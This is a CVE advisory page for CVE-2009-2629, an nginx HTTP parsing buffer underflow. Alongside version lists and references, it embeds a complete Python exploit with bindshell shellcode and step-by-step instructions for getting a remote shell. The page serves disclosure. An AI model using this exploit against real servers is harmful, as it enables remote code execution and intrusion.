CVE-2009-2629

CVE Descriptions

Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-787	Out-of-bounds Write The product writes data past the end, or before the beginning, of the intended buffer.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	40.59%	–	–
2022-02-13	–	–	40.59%	–	–
2023-03-12	–	–	–	92.94%	–
2023-04-02	–	–	–	93.57%	–
2023-05-14	–	–	–	93.82%	–
2023-06-25	–	–	–	91.19%	–
2023-08-06	–	–	–	91.89%	–
2023-09-24	–	–	–	91.45%	–
2023-11-05	–	–	–	93.82%	–
2024-06-02	–	–	–	93.82%	–
2024-06-02	–	–	–	93.82%	–
2024-07-21	–	–	–	92.83%	–
2024-12-22	–	–	–	92.78%	–
2025-01-19	–	–	–	92.78%	–
2025-03-18	–	–	–	–	86.74%
2025-04-06	–	–	–	–	83.82%
2025-04-22	–	–	–	–	85.78%
2025-04-22	–	–	–	–	85.78,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	97%
2022-02-13	98%
2023-03-12	98%
2023-04-02	99%
2023-05-14	99%
2023-06-25	98%
2023-08-06	99%
2023-09-24	99%
2023-11-05	99%
2024-06-02	99%
2024-06-02	99%
2024-07-21	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	99%
2025-04-06	99%
2025-04-22	99%
2025-04-22	99%

Exploit information

Exploit Database EDB-ID : 14830

Publication date : 2010-08-28 22h00 +00:00
Author : Aaron Conole
EDB Verified : Yes

#!/usr/bin/env python # # Exploit Title: nginx heap corruption # Date: 08/26/2010 # Author: aaron conole <apconole@yahoo.com> # Software Link: http://nginx.org/download/nginx-0.6.38.tar.gz # Version: <= 0.6.38, <= 0.7.61 # Tested on: BT4R1 running nginx 0.6.38 locally # CVE: 2009-2629 # # note: this was written and tested against BT4. This means it's an # intel x86 setup (ie: offsets for 32-bit machine, etc.). YMMV # also - only tested successfully against nginx 0.6.38 # you'll definitely need to modify against other versions # # you'll need to know where the offset is going to land, and what the pad is # from that point to when you've tained execution flow. # # A quick way to find out just for verification would be to launch nginx, # attach GDB to the worker and target it with the exploit, setting the offset # to 0, or some other arbitrary value. It should crash on a piece of code which # resembles: # if (ctx->offset) # # At that point, merely dump the *r; capture the value for the data pointer # (it'll be the one with "GET //../Aa0") and add 131 to it (decimal 131 to the # hex pointer value). That should give you a good area to test with. You might # want to use the range at that point and set the last octet to 00. # # NOTE: you'll need a configuration with merge_slashes enabled. I haven't yet # found a "magic" combination that would cause the state machine to do # what I want to make the bug trigger. Once I do, you can bet BUG will be # replaced. #Basically, on BT4: #- compile #- edit the configuration to enable merge slashes (just insert a line above the sendpage / sendfile config option "merge_slashes off;") #- Launch nginx, and attach GDB to the worker #- Send the exploit at it with offset 0x11111111 #- When the worker gets a sigsegv, it will be on a line which looks like "if (ctx->offset)", at that point type "p *r" #- In the r data structure will be a few different fields, one which is a buffer that contains "GET //../Aa0Aa1Aa2..". This buffer has an address (lets say 0x8c1d32f). #- Save off this address, and detach from the worker. A new one will spawn (the "manager" process will keep it going). #- At this point, rerun the exploit, setting the offset to 0x8c1d300 and adding the -b flag #- In a minute or two, you should be given the shell. import os import sys import socket import select import struct import time import urllib REQUEST_METHOD='GET ' # NOTE - this is a 32-bit null pointer. A 64-bit version would be 8-bytes (but take care to re-verify the structures) NULLPTR='\x00\x00\x00\x00' # NOTE - this shellcode was shamelessly stolen from the www # port 31337 bindshell for /bin/sh SHELL='\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80' # Why did I write this up this way? Because given enough time, I think I can # find a proper set of state change which can give me the same effect (ie: ../ # appearing as the 3rd, 4th, and 5th characters) at a later date. # That's all controlled by the complex uri parsing bit, though. DOUBLE_SLASH='//../' BUG=DOUBLE_SLASH # taken from the metasploit pattern_create.rb PATTERN='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4' def connect_socket(host,port): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect( (host, port) ) except: return 0 #sock.setblocking(0) return sock def handle_connection(sock): while(1): r, w, e = select.select( [sock, sys.stdin], [], [sock, sys.stdin] ) for s in r: if s == sys.stdin: buf = sys.stdin.readline() try: if buf != '': sock.send(buf) except: print "Xon close?" return 0 elif s == sock: try: buf = sock.recv(100) except: print "Xon close?" return 0 if buf != '': sys.stdout.write(buf) def main(argv): argc = len(argv) if argc < 4: print "usage: %s <host> <port> <ctx_addr> [-b]" % (argv[0]) print "[*] exploit for nginx <= 0.6.38 CVE 2009-2629" print "[*] host = the remote host name" print "[*] port = the remote port" print "[*] ctx_addr is where the context address should begin at" print "[*] -b specifies a brute-force (which will start at ctx_addr" sys.exit(0) host = argv[1] port = int(argv[2]) ctx_addr = int(argv[3],16) brute_flag = 0 if(argc == 5): brute_flag = 1 testing = 1 print "[*] target: %s:%d" % (host, port) try: sd = urllib.urlopen("http://%s:%d" % (host, port)) sd.close() except IOError, errmsg: print "[*] error: %s" % (errmsg) sys.exit(1) print "[*] sending exploit string to %s:%d" % (host, port) while(testing): CTX_ADDRESS = struct.pack('<L',ctx_addr) CTX_OUT_ADDRESS = struct.pack('<L', ctx_addr-60) POOL_ADDRESS = struct.pack('<L',ctx_addr+56) DATA_ADDRESS = struct.pack('<L',ctx_addr+86) RANGE_ADDRESS = struct.pack('<L',ctx_addr+124) SHELL_ADDRESS = struct.pack('<L',ctx_addr+128) #PADDING SHELLCODE=PATTERN[:67] #the output context structure SHELLCODE+=NULLPTR*9+POOL_ADDRESS+NULLPTR*4+SHELL_ADDRESS #Magic SHELLCODE+=CTX_OUT_ADDRESS+CTX_ADDRESS+NULLPTR #this is the context object - some null ptrs, then we set range, then #pool address SHELLCODE+=NULLPTR*3+RANGE_ADDRESS+'\x01\x00\x00\x00' SHELLCODE+=NULLPTR*2+POOL_ADDRESS #this is the data buffer object SHELLCODE+=NULLPTR*4+SHELL_ADDRESS+NULLPTR #this is the pool memory structure .. SHELLCODE+=DATA_ADDRESS+NULLPTR+POOL_ADDRESS+NULLPTR*12+NULLPTR # this is the range structure SHELLCODE+='\xff\xff\xff\xff'+NULLPTR*3 SHELLCODE+=SHELL payload = REQUEST_METHOD payload += BUG payload += SHELLCODE payload += ' HTTP/1.0\r\n\r\n' sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sd.connect((host, port)) sd.send(payload) sd.close() if (brute_flag): nsock = connect_socket(host,31337) if nsock != 0: print "[*] Successful Exploit via buffer: %x" % (ctx_addr) testing = 0 handle_connection(nsock) else: ctx_addr = ctx_addr + 1 else: testing = 0 print "[*] FIN." if __name__ == "__main__": main(sys.argv) sys.exit(0) # EOF

Products Mentioned

Configuraton 0

F5>>Nginx >> Version From (including) 0.1.0 To (excluding) 0.5.38

F5>>Nginx >> Version 0.1.0 (Open CPE detail)
F5>>Nginx >> Version 0.1.1 (Open CPE detail)
F5>>Nginx >> Version 0.1.2 (Open CPE detail)
F5>>Nginx >> Version 0.1.3 (Open CPE detail)
F5>>Nginx >> Version 0.1.4 (Open CPE detail)
F5>>Nginx >> Version 0.1.5 (Open CPE detail)
F5>>Nginx >> Version 0.1.6 (Open CPE detail)
F5>>Nginx >> Version 0.1.7 (Open CPE detail)
F5>>Nginx >> Version 0.1.8 (Open CPE detail)
F5>>Nginx >> Version 0.1.9 (Open CPE detail)
F5>>Nginx >> Version 0.1.10 (Open CPE detail)
F5>>Nginx >> Version 0.1.11 (Open CPE detail)
F5>>Nginx >> Version 0.1.12 (Open CPE detail)
F5>>Nginx >> Version 0.1.13 (Open CPE detail)
F5>>Nginx >> Version 0.1.14 (Open CPE detail)
F5>>Nginx >> Version 0.1.15 (Open CPE detail)
F5>>Nginx >> Version 0.1.16 (Open CPE detail)
F5>>Nginx >> Version 0.1.17 (Open CPE detail)
F5>>Nginx >> Version 0.1.18 (Open CPE detail)
F5>>Nginx >> Version 0.1.19 (Open CPE detail)
F5>>Nginx >> Version 0.1.20 (Open CPE detail)
F5>>Nginx >> Version 0.1.21 (Open CPE detail)
F5>>Nginx >> Version 0.1.22 (Open CPE detail)
F5>>Nginx >> Version 0.1.23 (Open CPE detail)
F5>>Nginx >> Version 0.1.24 (Open CPE detail)
F5>>Nginx >> Version 0.1.25 (Open CPE detail)
F5>>Nginx >> Version 0.1.26 (Open CPE detail)
F5>>Nginx >> Version 0.1.27 (Open CPE detail)
F5>>Nginx >> Version 0.1.28 (Open CPE detail)
F5>>Nginx >> Version 0.1.29 (Open CPE detail)
F5>>Nginx >> Version 0.1.30 (Open CPE detail)
F5>>Nginx >> Version 0.1.31 (Open CPE detail)
F5>>Nginx >> Version 0.1.32 (Open CPE detail)
F5>>Nginx >> Version 0.1.33 (Open CPE detail)
F5>>Nginx >> Version 0.1.34 (Open CPE detail)
F5>>Nginx >> Version 0.1.35 (Open CPE detail)
F5>>Nginx >> Version 0.1.36 (Open CPE detail)
F5>>Nginx >> Version 0.1.37 (Open CPE detail)
F5>>Nginx >> Version 0.1.38 (Open CPE detail)
F5>>Nginx >> Version 0.1.39 (Open CPE detail)
F5>>Nginx >> Version 0.1.40 (Open CPE detail)
F5>>Nginx >> Version 0.1.41 (Open CPE detail)
F5>>Nginx >> Version 0.1.42 (Open CPE detail)
F5>>Nginx >> Version 0.1.43 (Open CPE detail)
F5>>Nginx >> Version 0.1.44 (Open CPE detail)
F5>>Nginx >> Version 0.1.45 (Open CPE detail)
F5>>Nginx >> Version 0.2.0 (Open CPE detail)
F5>>Nginx >> Version 0.2.1 (Open CPE detail)
F5>>Nginx >> Version 0.2.2 (Open CPE detail)
F5>>Nginx >> Version 0.2.3 (Open CPE detail)
F5>>Nginx >> Version 0.2.4 (Open CPE detail)
F5>>Nginx >> Version 0.2.5 (Open CPE detail)
F5>>Nginx >> Version 0.2.6 (Open CPE detail)
F5>>Nginx >> Version 0.3.0 (Open CPE detail)
F5>>Nginx >> Version 0.3.1 (Open CPE detail)
F5>>Nginx >> Version 0.3.2 (Open CPE detail)
F5>>Nginx >> Version 0.3.3 (Open CPE detail)
F5>>Nginx >> Version 0.3.4 (Open CPE detail)
F5>>Nginx >> Version 0.3.5 (Open CPE detail)
F5>>Nginx >> Version 0.3.6 (Open CPE detail)
F5>>Nginx >> Version 0.3.7 (Open CPE detail)
F5>>Nginx >> Version 0.3.8 (Open CPE detail)
F5>>Nginx >> Version 0.3.9 (Open CPE detail)
F5>>Nginx >> Version 0.3.10 (Open CPE detail)
F5>>Nginx >> Version 0.3.11 (Open CPE detail)
F5>>Nginx >> Version 0.3.12 (Open CPE detail)
F5>>Nginx >> Version 0.3.13 (Open CPE detail)
F5>>Nginx >> Version 0.3.14 (Open CPE detail)
F5>>Nginx >> Version 0.3.15 (Open CPE detail)
F5>>Nginx >> Version 0.3.16 (Open CPE detail)
F5>>Nginx >> Version 0.3.17 (Open CPE detail)
F5>>Nginx >> Version 0.3.18 (Open CPE detail)
F5>>Nginx >> Version 0.3.19 (Open CPE detail)
F5>>Nginx >> Version 0.3.20 (Open CPE detail)
F5>>Nginx >> Version 0.3.21 (Open CPE detail)
F5>>Nginx >> Version 0.3.22 (Open CPE detail)
F5>>Nginx >> Version 0.3.23 (Open CPE detail)
F5>>Nginx >> Version 0.3.24 (Open CPE detail)
F5>>Nginx >> Version 0.3.25 (Open CPE detail)
F5>>Nginx >> Version 0.3.26 (Open CPE detail)
F5>>Nginx >> Version 0.3.27 (Open CPE detail)
F5>>Nginx >> Version 0.3.28 (Open CPE detail)
F5>>Nginx >> Version 0.3.29 (Open CPE detail)
F5>>Nginx >> Version 0.3.30 (Open CPE detail)
F5>>Nginx >> Version 0.3.31 (Open CPE detail)
F5>>Nginx >> Version 0.3.32 (Open CPE detail)
F5>>Nginx >> Version 0.3.33 (Open CPE detail)
F5>>Nginx >> Version 0.3.34 (Open CPE detail)
F5>>Nginx >> Version 0.3.35 (Open CPE detail)
F5>>Nginx >> Version 0.3.36 (Open CPE detail)
F5>>Nginx >> Version 0.3.37 (Open CPE detail)
F5>>Nginx >> Version 0.3.38 (Open CPE detail)
F5>>Nginx >> Version 0.3.39 (Open CPE detail)
F5>>Nginx >> Version 0.3.40 (Open CPE detail)
F5>>Nginx >> Version 0.3.41 (Open CPE detail)
F5>>Nginx >> Version 0.3.42 (Open CPE detail)
F5>>Nginx >> Version 0.3.43 (Open CPE detail)
F5>>Nginx >> Version 0.3.44 (Open CPE detail)
F5>>Nginx >> Version 0.3.45 (Open CPE detail)
F5>>Nginx >> Version 0.3.46 (Open CPE detail)
F5>>Nginx >> Version 0.3.47 (Open CPE detail)
F5>>Nginx >> Version 0.3.48 (Open CPE detail)
F5>>Nginx >> Version 0.3.49 (Open CPE detail)
F5>>Nginx >> Version 0.3.50 (Open CPE detail)
F5>>Nginx >> Version 0.3.51 (Open CPE detail)
F5>>Nginx >> Version 0.3.52 (Open CPE detail)
F5>>Nginx >> Version 0.3.53 (Open CPE detail)
F5>>Nginx >> Version 0.3.54 (Open CPE detail)
F5>>Nginx >> Version 0.3.55 (Open CPE detail)
F5>>Nginx >> Version 0.3.56 (Open CPE detail)
F5>>Nginx >> Version 0.3.57 (Open CPE detail)
F5>>Nginx >> Version 0.3.58 (Open CPE detail)
F5>>Nginx >> Version 0.3.59 (Open CPE detail)
F5>>Nginx >> Version 0.3.60 (Open CPE detail)
F5>>Nginx >> Version 0.3.61 (Open CPE detail)
F5>>Nginx >> Version 0.4.0 (Open CPE detail)
F5>>Nginx >> Version 0.4.1 (Open CPE detail)
F5>>Nginx >> Version 0.4.2 (Open CPE detail)
F5>>Nginx >> Version 0.4.3 (Open CPE detail)
F5>>Nginx >> Version 0.4.4 (Open CPE detail)
F5>>Nginx >> Version 0.4.5 (Open CPE detail)
F5>>Nginx >> Version 0.4.6 (Open CPE detail)
F5>>Nginx >> Version 0.4.7 (Open CPE detail)
F5>>Nginx >> Version 0.4.8 (Open CPE detail)
F5>>Nginx >> Version 0.4.9 (Open CPE detail)
F5>>Nginx >> Version 0.4.10 (Open CPE detail)
F5>>Nginx >> Version 0.4.11 (Open CPE detail)
F5>>Nginx >> Version 0.4.12 (Open CPE detail)
F5>>Nginx >> Version 0.4.13 (Open CPE detail)
F5>>Nginx >> Version 0.4.14 (Open CPE detail)
F5>>Nginx >> Version 0.5.0 (Open CPE detail)
F5>>Nginx >> Version 0.5.1 (Open CPE detail)
F5>>Nginx >> Version 0.5.2 (Open CPE detail)
F5>>Nginx >> Version 0.5.3 (Open CPE detail)
F5>>Nginx >> Version 0.5.4 (Open CPE detail)
F5>>Nginx >> Version 0.5.5 (Open CPE detail)
F5>>Nginx >> Version 0.5.6 (Open CPE detail)
F5>>Nginx >> Version 0.5.7 (Open CPE detail)
F5>>Nginx >> Version 0.5.8 (Open CPE detail)
F5>>Nginx >> Version 0.5.9 (Open CPE detail)
F5>>Nginx >> Version 0.5.10 (Open CPE detail)
F5>>Nginx >> Version 0.5.11 (Open CPE detail)
F5>>Nginx >> Version 0.5.12 (Open CPE detail)
F5>>Nginx >> Version 0.5.13 (Open CPE detail)
F5>>Nginx >> Version 0.5.14 (Open CPE detail)
F5>>Nginx >> Version 0.5.15 (Open CPE detail)
F5>>Nginx >> Version 0.5.16 (Open CPE detail)
F5>>Nginx >> Version 0.5.17 (Open CPE detail)
F5>>Nginx >> Version 0.5.18 (Open CPE detail)
F5>>Nginx >> Version 0.5.19 (Open CPE detail)
F5>>Nginx >> Version 0.5.20 (Open CPE detail)
F5>>Nginx >> Version 0.5.21 (Open CPE detail)
F5>>Nginx >> Version 0.5.22 (Open CPE detail)
F5>>Nginx >> Version 0.5.23 (Open CPE detail)
F5>>Nginx >> Version 0.5.24 (Open CPE detail)
F5>>Nginx >> Version 0.5.25 (Open CPE detail)
F5>>Nginx >> Version 0.5.26 (Open CPE detail)
F5>>Nginx >> Version 0.5.27 (Open CPE detail)
F5>>Nginx >> Version 0.5.28 (Open CPE detail)
F5>>Nginx >> Version 0.5.29 (Open CPE detail)
F5>>Nginx >> Version 0.5.30 (Open CPE detail)
F5>>Nginx >> Version 0.5.31 (Open CPE detail)
F5>>Nginx >> Version 0.5.32 (Open CPE detail)
F5>>Nginx >> Version 0.5.33 (Open CPE detail)
F5>>Nginx >> Version 0.5.34 (Open CPE detail)
F5>>Nginx >> Version 0.5.35 (Open CPE detail)
F5>>Nginx >> Version 0.5.36 (Open CPE detail)
F5>>Nginx >> Version 0.5.37 (Open CPE detail)

F5>>Nginx >> Version From (including) 0.6.0 To (excluding) 0.6.39

F5>>Nginx >> Version 0.6.0 (Open CPE detail)
F5>>Nginx >> Version 0.6.1 (Open CPE detail)
F5>>Nginx >> Version 0.6.2 (Open CPE detail)
F5>>Nginx >> Version 0.6.3 (Open CPE detail)
F5>>Nginx >> Version 0.6.4 (Open CPE detail)
F5>>Nginx >> Version 0.6.5 (Open CPE detail)
F5>>Nginx >> Version 0.6.6 (Open CPE detail)
F5>>Nginx >> Version 0.6.7 (Open CPE detail)
F5>>Nginx >> Version 0.6.8 (Open CPE detail)
F5>>Nginx >> Version 0.6.9 (Open CPE detail)
F5>>Nginx >> Version 0.6.10 (Open CPE detail)
F5>>Nginx >> Version 0.6.11 (Open CPE detail)
F5>>Nginx >> Version 0.6.12 (Open CPE detail)
F5>>Nginx >> Version 0.6.13 (Open CPE detail)
F5>>Nginx >> Version 0.6.14 (Open CPE detail)
F5>>Nginx >> Version 0.6.15 (Open CPE detail)
F5>>Nginx >> Version 0.6.16 (Open CPE detail)
F5>>Nginx >> Version 0.6.17 (Open CPE detail)
F5>>Nginx >> Version 0.6.18 (Open CPE detail)
F5>>Nginx >> Version 0.6.19 (Open CPE detail)
F5>>Nginx >> Version 0.6.20 (Open CPE detail)
F5>>Nginx >> Version 0.6.21 (Open CPE detail)
F5>>Nginx >> Version 0.6.22 (Open CPE detail)
F5>>Nginx >> Version 0.6.23 (Open CPE detail)
F5>>Nginx >> Version 0.6.24 (Open CPE detail)
F5>>Nginx >> Version 0.6.25 (Open CPE detail)
F5>>Nginx >> Version 0.6.26 (Open CPE detail)
F5>>Nginx >> Version 0.6.27 (Open CPE detail)
F5>>Nginx >> Version 0.6.28 (Open CPE detail)
F5>>Nginx >> Version 0.6.29 (Open CPE detail)
F5>>Nginx >> Version 0.6.30 (Open CPE detail)
F5>>Nginx >> Version 0.6.31 (Open CPE detail)
F5>>Nginx >> Version 0.6.32 (Open CPE detail)
F5>>Nginx >> Version 0.6.33 (Open CPE detail)
F5>>Nginx >> Version 0.6.34 (Open CPE detail)
F5>>Nginx >> Version 0.6.35 (Open CPE detail)
F5>>Nginx >> Version 0.6.36 (Open CPE detail)
F5>>Nginx >> Version 0.6.37 (Open CPE detail)
F5>>Nginx >> Version 0.6.38 (Open CPE detail)

F5>>Nginx >> Version From (including) 0.7.0 To (excluding) 0.7.62

F5>>Nginx >> Version 0.7.0 (Open CPE detail)
F5>>Nginx >> Version 0.7.1 (Open CPE detail)
F5>>Nginx >> Version 0.7.2 (Open CPE detail)
F5>>Nginx >> Version 0.7.3 (Open CPE detail)
F5>>Nginx >> Version 0.7.4 (Open CPE detail)
F5>>Nginx >> Version 0.7.5 (Open CPE detail)
F5>>Nginx >> Version 0.7.6 (Open CPE detail)
F5>>Nginx >> Version 0.7.7 (Open CPE detail)
F5>>Nginx >> Version 0.7.8 (Open CPE detail)
F5>>Nginx >> Version 0.7.9 (Open CPE detail)
F5>>Nginx >> Version 0.7.10 (Open CPE detail)
F5>>Nginx >> Version 0.7.11 (Open CPE detail)
F5>>Nginx >> Version 0.7.12 (Open CPE detail)
F5>>Nginx >> Version 0.7.13 (Open CPE detail)
F5>>Nginx >> Version 0.7.14 (Open CPE detail)
F5>>Nginx >> Version 0.7.15 (Open CPE detail)
F5>>Nginx >> Version 0.7.16 (Open CPE detail)
F5>>Nginx >> Version 0.7.17 (Open CPE detail)
F5>>Nginx >> Version 0.7.18 (Open CPE detail)
F5>>Nginx >> Version 0.7.19 (Open CPE detail)
F5>>Nginx >> Version 0.7.20 (Open CPE detail)
F5>>Nginx >> Version 0.7.21 (Open CPE detail)
F5>>Nginx >> Version 0.7.22 (Open CPE detail)
F5>>Nginx >> Version 0.7.23 (Open CPE detail)
F5>>Nginx >> Version 0.7.24 (Open CPE detail)
F5>>Nginx >> Version 0.7.25 (Open CPE detail)
F5>>Nginx >> Version 0.7.26 (Open CPE detail)
F5>>Nginx >> Version 0.7.27 (Open CPE detail)
F5>>Nginx >> Version 0.7.28 (Open CPE detail)
F5>>Nginx >> Version 0.7.29 (Open CPE detail)
F5>>Nginx >> Version 0.7.30 (Open CPE detail)
F5>>Nginx >> Version 0.7.31 (Open CPE detail)
F5>>Nginx >> Version 0.7.32 (Open CPE detail)
F5>>Nginx >> Version 0.7.33 (Open CPE detail)
F5>>Nginx >> Version 0.7.34 (Open CPE detail)
F5>>Nginx >> Version 0.7.35 (Open CPE detail)
F5>>Nginx >> Version 0.7.36 (Open CPE detail)
F5>>Nginx >> Version 0.7.37 (Open CPE detail)
F5>>Nginx >> Version 0.7.38 (Open CPE detail)
F5>>Nginx >> Version 0.7.39 (Open CPE detail)
F5>>Nginx >> Version 0.7.40 (Open CPE detail)
F5>>Nginx >> Version 0.7.41 (Open CPE detail)
F5>>Nginx >> Version 0.7.42 (Open CPE detail)
F5>>Nginx >> Version 0.7.43 (Open CPE detail)
F5>>Nginx >> Version 0.7.44 (Open CPE detail)
F5>>Nginx >> Version 0.7.45 (Open CPE detail)
F5>>Nginx >> Version 0.7.46 (Open CPE detail)
F5>>Nginx >> Version 0.7.47 (Open CPE detail)
F5>>Nginx >> Version 0.7.48 (Open CPE detail)
F5>>Nginx >> Version 0.7.49 (Open CPE detail)
F5>>Nginx >> Version 0.7.50 (Open CPE detail)
F5>>Nginx >> Version 0.7.51 (Open CPE detail)
F5>>Nginx >> Version 0.7.52 (Open CPE detail)
F5>>Nginx >> Version 0.7.53 (Open CPE detail)
F5>>Nginx >> Version 0.7.54 (Open CPE detail)
F5>>Nginx >> Version 0.7.55 (Open CPE detail)
F5>>Nginx >> Version 0.7.56 (Open CPE detail)
F5>>Nginx >> Version 0.7.57 (Open CPE detail)
F5>>Nginx >> Version 0.7.58 (Open CPE detail)
F5>>Nginx >> Version 0.7.59 (Open CPE detail)
F5>>Nginx >> Version 0.7.60 (Open CPE detail)
F5>>Nginx >> Version 0.7.61 (Open CPE detail)

F5>>Nginx >> Version From (including) 0.8.0 To (excluding) 0.8.15

F5>>Nginx >> Version 0.8.0 (Open CPE detail)
F5>>Nginx >> Version 0.8.1 (Open CPE detail)
F5>>Nginx >> Version 0.8.2 (Open CPE detail)
F5>>Nginx >> Version 0.8.3 (Open CPE detail)
F5>>Nginx >> Version 0.8.4 (Open CPE detail)
F5>>Nginx >> Version 0.8.5 (Open CPE detail)
F5>>Nginx >> Version 0.8.6 (Open CPE detail)
F5>>Nginx >> Version 0.8.7 (Open CPE detail)
F5>>Nginx >> Version 0.8.8 (Open CPE detail)
F5>>Nginx >> Version 0.8.9 (Open CPE detail)
F5>>Nginx >> Version 0.8.10 (Open CPE detail)
F5>>Nginx >> Version 0.8.11 (Open CPE detail)
F5>>Nginx >> Version 0.8.12 (Open CPE detail)
F5>>Nginx >> Version 0.8.13 (Open CPE detail)
F5>>Nginx >> Version 0.8.14 (Open CPE detail)

Configuraton 0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0 (Open CPE detail)

Debian>>Debian_linux >> Version 5.0

Debian>>Debian_linux >> Version 5.0 (Open CPE detail)

Debian>>Debian_linux >> Version 6.0

Debian>>Debian_linux >> Version 6.0 (Open CPE detail)

Configuraton 0

Fedoraproject>>Fedora >> Version 10

Fedoraproject>>Fedora >> Version 10 (Open CPE detail)

Fedoraproject>>Fedora >> Version 11

Fedoraproject>>Fedora >> Version 11 (Open CPE detail)

Fedoraproject>>Fedora >> Version 12

Fedoraproject>>Fedora >> Version 12 (Open CPE detail)

References

http://www.kb.cert.org/vuls/id/180065
Tags : third-party-advisory, x_refsource_CERT-VN

https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00428.html
Tags : vendor-advisory, x_refsource_FEDORA

http://nginx.net/CHANGES-0.7
Tags : x_refsource_CONFIRM

http://nginx.net/CHANGES
Tags : x_refsource_CONFIRM

http://sysoev.ru/nginx/patch.180065.txt
Tags : x_refsource_CONFIRM

http://www.debian.org/security/2009/dsa-1884
Tags : vendor-advisory, x_refsource_DEBIAN

https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00442.html
Tags : vendor-advisory, x_refsource_FEDORA

https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00449.html
Tags : vendor-advisory, x_refsource_FEDORA

http://nginx.net/CHANGES-0.5
Tags : x_refsource_CONFIRM

http://nginx.net/CHANGES-0.6
Tags : x_refsource_CONFIRM

CVE-2009-2629 : Detail

CVE-2009-2629

CVE Descriptions

CVE Informations

Related Weaknesses

Metrics

EPSS

EPSS Score

EPSS Percentile

Exploit information

Exploit Database EDB-ID : 14830

Products Mentioned

Configuraton 0

Configuraton 0

Configuraton 0

References